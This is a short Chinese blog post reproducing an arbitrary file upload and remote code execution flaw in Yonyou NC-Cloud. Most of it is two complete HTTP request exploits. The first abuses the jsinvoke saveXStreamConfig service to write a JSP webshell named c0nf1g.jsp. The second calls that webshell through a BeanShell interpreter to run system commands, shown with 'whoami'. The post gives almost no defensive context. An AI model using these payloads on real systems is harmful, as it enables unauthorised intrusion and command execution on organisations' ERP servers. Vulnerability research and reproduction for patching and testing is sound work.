Always keep a|

都吃泡芙

园龄:9个月粉丝:4关注:4

用友-NC-Cloud存在任意文件上传/RCE

漏洞复现:

首先上传jsp

POC:

POST /uapjs/jsinvoke/?action=invoke HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.622.93 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 252

{"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig","parameterTypes":["java.lang.Object","java.lang.String"],"parameters":["${param.getClass().forName(param.error).newInstance().eval(param.cmd)}","webapps/nc_web/c0nf1g.jsp"]}

image

访问c0nf1g.jsp构造RCE

POC:

POST /c0nf1g.jsp?error=bsh.Interpreter HTTP/1.1
Host: ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.2821.52 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 98

cmd=org.apache.commons.io.IOUtils.toString(Runtime.getRuntime().exec("whoami").getInputStream())

image

本文作者:都吃泡芙

本文链接:https://www.cnblogs.com/pa0fu/p/18269408

版权声明:本作品采用知识共享署名-非商业性使用-禁止演绎 2.5 中国大陆许可协议进行许可。

posted @   都吃泡芙  阅读(69)  评论(0编辑  收藏  举报
//雪花飘落效果 //雪花飘落效果
点击右上角即可分享
微信分享提示
评论
收藏
关注
推荐
深色
回顶
收起